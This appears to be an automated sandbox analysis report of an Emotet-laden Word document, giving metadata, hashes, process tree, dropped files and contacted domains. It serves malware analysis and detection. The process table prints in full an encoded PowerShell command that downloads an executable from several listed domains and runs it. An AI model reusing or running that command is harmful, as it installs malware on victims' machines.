download: | fxcDxjiCijKxHrcNzPQymDUAwgS |
Full analysis: | https://app.any.run/tasks/71aa6714-a84a-48b6-86ef-5b647dfdc797 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | October 09, 2019, 14:43:36 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Books & Music, Subject: JSON, Author: Missouri Hoeger, Keywords: bandwidth, Comments: primary, Template: Normal.dotm, Last Saved By: Alanis Corwin, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Oct 9 13:18:00 2019, Last Saved Time/Date: Wed Oct 9 13:18:00 2019, Number of Pages: 1, Number of Words: 29, Number of Characters: 168, Security: 0 |
MD5: | 8A19585D708831AFE179FABD1BC08BAD |
SHA1: | AA71FD10191B7A8E5B2B40136CAAF54142A90AE6 |
SHA256: | 32A27F26DA134AE8E33728157DA7C8586587B223E767CB1771982E77770C5082 |
SSDEEP: | 3072:jeGRyYtKgdzSrGtKyIwLx397JsbVWhnmApAFx1Gam73aSWuns2w4DYAF9I:jeGRyYtKUzSSnLx3TzOYVHs2f |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
Manager: | Abernathy |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 196 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | Cronin - Morar |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 168 |
Words: | 29 |
Pages: | 1 |
ModifyDate: | 2019:10:09 12:18:00 |
CreateDate: | 2019:10:09 12:18:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | Alanis Corwin |
Template: | Normal.dotm |
Comments: | primary |
Keywords: | bandwidth |
Author: | Missouri Hoeger |
Subject: | JSON |
Title: | Books & Music |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2720 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\fxcDxjiCijKxHrcNzPQymDUAwgS.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2436 | powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABiADAAMAAwADUAMwAyAGMANAAwADAAPQAnAGIAMAAwADQANAA5ADQAeAA0ADUANgAnADsAJABjADIANQA3ADQAYwAyADQAOAAxADcAIAA9ACAAJwAxADcAOAAnADsAJABiADcAYgA0ADcAeAAzADAAMAA2ADcAMQBjAD0AJwBiADQANwAwADMAOAA0ADUAMQAwADAAJwA7ACQAYwA4ADEANgA4AGMAOAA0ADMAOQA1AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABjADIANQA3ADQAYwAyADQAOAAxADcAKwAnAC4AZQB4AGUAJwA7ACQAeAAzADIANwAzADQAOAA2ADIANQAyAD0AJwBjADAAMwAwAGMANwA1ADAAMAB4ADAAMgA5ACcAOwAkAGMANgA5AGMAMAAwADgANAAyADAAYwA9ACYAKAAnAG4AZQB3AC0AbwBiACcAKwAnAGoAZQAnACsAJwBjAHQAJwApACAAbgBFAHQALgB3AEUAQgBDAEwASQBlAG4AVAA7ACQAYgAwADUAMAA0AGIAYwBjADYAYgBjADAAOAA9ACcAaAB0AHQAcAA6AC8ALwBzAHQAZQBwAGgAcABvAHIAbgAuAGMAbwBtAC8AYwBnAGkALQBiAGkAbgAvAG8AUwBXAFMAeQBpAEsATgB6AGYALwBAAGgAdAB0AHAAcwA6AC8ALwB0AGgAZQBoAG8AcABlAGgAZQByAGIAYQBsAC4AYwBvAG0ALwB0AHIAbwBwAGkAYwBhAC8AUABBAGIATABQAFEAQgBTAC8AQABoAHQAdABwAHMAOgAvAC8AZQAtAGMAZQBuAHQAcgBpAGMAaQB0AHkALgBjAG8AbQAvAGMAcwBzAC8AegBjAG4ASQBkAFcAVQBoAGIAZAAvAEAAaAB0AHQAcABzADoALwAvAG4AZQB3AGEAZwBlAHMAbAAuAGMAbwBtAC8AYwBnAGkALQBiAGkAbgAvAFcARQBIAHEARAB3AGoAdwBTAC8AQABoAHQAdABwADoALwAvAHcAdwB3AC4AdwBlAHMAdABiAHUAcgB5AGQAZQBuAHQAYQBsAGMAYQByAGUALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBoAHYAZwAxAGsAXwAxAGQAcgA1AGMAZAAtADkAOQA5AC8AJwAuACIAcwBgAFAAbABJAFQAIgAoACcAQAAnACkAOwAkAHgAMAA3ADgAMAB4ADkANgAyAHgAMAA9ACcAYgAxADAAMwAyADcAMAA0AGMANAA4ACcAOwBmAG8AcgBlAGEAYwBoACgAJABjAGIAYwA3ADEAMwA5AHgAOQA2AGIAIABpAG4AIAAkAGIAMAA1ADAANABiAGMAYwA2AGIAYwAwADgAKQB7AHQAcgB5AHsAJABjADYAOQBjADAAMAA4ADQAMgAwAGMALgAiAGQATwBXAGAATgBMAG8AYABBAGQARgBpAGAATABlACIAKAAkAGMAYgBjADcAMQAzADkAeAA5ADYAYgAsACAAJABjADgAMQA2ADgAYwA4ADQAMwA5ADUAKQA7ACQAeABjADIAMwAzADgAYwA0ADQANAAwADcAPQAnAGMANQBiADAAMgAwADEANAA3AGIANwAwAGIAJwA7AEkAZgAgACgAKAAmACgAJwBHACcAKwAnAGUAJwArACcAdAAtAEkAdABlAG0AJwApACAAJABjADgAMQA2ADgAYwA4ADQAMwA5ADUAKQAuACIAbABlAE4AYABnAGAAVABIACIAIAAtAGcAZQAgADIANgA1ADMAOAApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAHQAYQBgAFIAdAAiACgAJABjADgAMQA2ADgAYwA4ADQAMwA5ADUAKQA7ACQAYgAwADMAMwA5ADcAMQAwADgAMQA3ADAAYwA9ACcAYwA3ADAAMAAwAGIANwA0ADYANAAwACcAOwBiAHIAZQBhAGsAOwAkAGMAMwA2ADAANgA0ADAAMAAyADMAMAA9ACcAeABiAGIAMgAyADIAMAAwADAANAAxACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAGMAMAA2ADAAMAAwAHgAMABjADMAOQAwADMAPQAnAHgANgAxADAANwA4ADAANQAyADIAYgA4ADAAJwA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3368 | "C:\Users\admin\178.exe" | C:\Users\admin\178.exe | — | powershell.exe |
User: admin Company: Monkey Head Software Integrity Level: MEDIUM Description: Monkey Head Media Stream Exit code: 0 Version: 1, 0, 0, 1 | ||||
2864 | --3a2e7ef0 | C:\Users\admin\178.exe | 178.exe | |
User: admin Company: Monkey Head Software Integrity Level: MEDIUM Description: Monkey Head Media Stream Exit code: 0 Version: 1, 0, 0, 1 | ||||
1428 | "C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe" | C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe | — | 178.exe |
User: admin Company: Monkey Head Software Integrity Level: MEDIUM Description: Monkey Head Media Stream Exit code: 0 Version: 1, 0, 0, 1 | ||||
2476 | --f91b2738 | C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe | — | msptermsizes.exe |
User: admin Company: Monkey Head Software Integrity Level: MEDIUM Description: Monkey Head Media Stream Version: 1, 0, 0, 1 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2720 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRBBA.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2436 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LT2J95KO7Z7TB4425MKF.temp | — | |
MD5:— | SHA256:— | |||
2720 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:A40F3E1E79BE581676DE0F0F782BEA97 | SHA256:F74F93B3457414CFA853144E356261AA30FBD7B6472FF0749D81E71A60E58B8D | |||
2720 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CD9B9507.wmf | wmf | |
MD5:1524BF5B989BFACF8313F38AA28D8E59 | SHA256:15C5C907A81C2B46540224D96DB6A633F01DD4E4401E2F0F2F3694B6F8027E6D | |||
2720 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DFE54BAD.wmf | wmf | |
MD5:8B13B58D637E7367543C66A20DB56AAB | SHA256:CBE2E2A262C5042A4F2B206227E1F2C8E8C935E47FE44B926579635F7B4FB05F | |||
2720 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5041DF3F.wmf | wmf | |
MD5:79578346D7F69B195D077D1FF79534EE | SHA256:80A41C386B4E6A144220AEC01F9156E49F699B127412041B13AC1CCDE9DC0FAC | |||
2720 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\26986AA5.wmf | wmf | |
MD5:4EA9ABF040351B59B31DD958BE7EA99C | SHA256:6DC1B136BC6F21A61F9B29EC3ABEC847A3BF73F308951EE3F37210E6FD4C792E | |||
2720 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:0DA97163FDEBFAEF04B4154A5B8216B7 | SHA256:9229E2C97B8BF46154BD3D26D9F3941F89975DE2735A7B46F86690505905C540 | |||
2720 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4E828743.wmf | wmf | |
MD5:A533D6F0D2894C38CFF010D3647D1C68 | SHA256:1E17CED9D48F7EA242EEBA8FCDD320DD89DD0FE3EF522F966F7D86D9017B0D29 | |||
2720 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5888C549.wmf | wmf | |
MD5:345C99FCD8F3742207719B148B6FA381 | SHA256:E7722CB425AFAC5E3F6EA00CFF6010448C9B249491BC5BEFD29AABFEADDD8E62 |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2436 | powershell.exe | 146.88.234.116:80 | stephporn.com | PlanetHoster | FR | suspicious |
2436 | powershell.exe | 35.238.93.185:443 | e-centricity.com | — | US | unknown |
2436 | powershell.exe | 43.255.154.26:443 | thehopeherbal.com | GoDaddy.com, LLC | SG | suspicious |
Domain | IP | Reputation |
---|---|---|
stephporn.com |
| suspicious |
thehopeherbal.com |
| suspicious |
e-centricity.com |
| malicious |